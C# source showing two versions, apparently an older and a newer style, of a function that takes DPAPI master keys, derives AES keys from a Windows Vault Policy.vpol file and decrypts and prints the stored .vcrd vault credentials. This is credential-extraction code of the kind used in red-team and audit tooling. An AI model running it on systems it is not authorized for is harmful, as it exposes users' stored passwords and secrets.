public static void TriageVaultFolder(string folder, Dictionary <string, string> MasterKeys) { // takes a Vault folder, extracts the AES 128/256 keys from Policy.vpol, and uses these // to decrypt any .vcrd vault credentials var policyFilePath = $"{folder}\\Policy.vpol"; if (!File.Exists(policyFilePath)) { return; } Console.WriteLine("\r\n[*] Triaging Vault folder: {0}", folder); var policyBytes = File.ReadAllBytes(policyFilePath); // first try to get vault keys from the Policy.vpol var keys = Dpapi.DescribeVaultPolicy(policyBytes, MasterKeys); // make sure we have keys returned if (keys.Count <= 0) { return; } var vaultCredFiles = Directory.GetFiles(folder); if ((vaultCredFiles == null) || (vaultCredFiles.Length == 0)) { return; } foreach (var vaultCredFile in vaultCredFiles) { var fileName = Path.GetFileName(vaultCredFile); if (!fileName.EndsWith("vcrd")) { continue; } try { var vaultCredBytes = File.ReadAllBytes(vaultCredFile); // describe the vault credential file using the Policy credentials Dpapi.DescribeVaultCred(vaultCredBytes, keys); } catch (Exception e) { Console.WriteLine("[X] Error triaging {0} : {1}", vaultCredFile, e.Message); } } }
public static void TriageVaultFolder(string folder, Dictionary <string, string> MasterKeys) { // takes a Vault folder, extracts the AES 128/256 keys from Policy.vpol, and uses these // to decrypt any .vcrd vault credentials string policyFilePath = String.Format("{0}\\Policy.vpol", folder); if (File.Exists(policyFilePath)) { Console.WriteLine("\r\n[*] Triaging Vault folder: {0}", folder); byte[] policyBytes = File.ReadAllBytes(policyFilePath); // first try to get vault keys from the Policy.vpol ArrayList keys = Dpapi.DescribePolicy(policyBytes, MasterKeys); if (keys.Count > 0) { // make sure we have keys returned string[] vaultCredFiles = Directory.GetFiles(folder); if ((vaultCredFiles != null) && (vaultCredFiles.Length != 0)) { foreach (string vaultCredFile in vaultCredFiles) { string fileName = System.IO.Path.GetFileName(vaultCredFile); if (fileName.EndsWith("vcrd")) { byte[] vaultCredBytes = File.ReadAllBytes(vaultCredFile); try { // describe the vault credential file using the Policy credentials Dpapi.DescribeVaultCred(vaultCredBytes, keys); } catch (Exception e) { Console.WriteLine("[X] Error triaging {0} : {1}", vaultCredFile, e.Message); } } } } } } }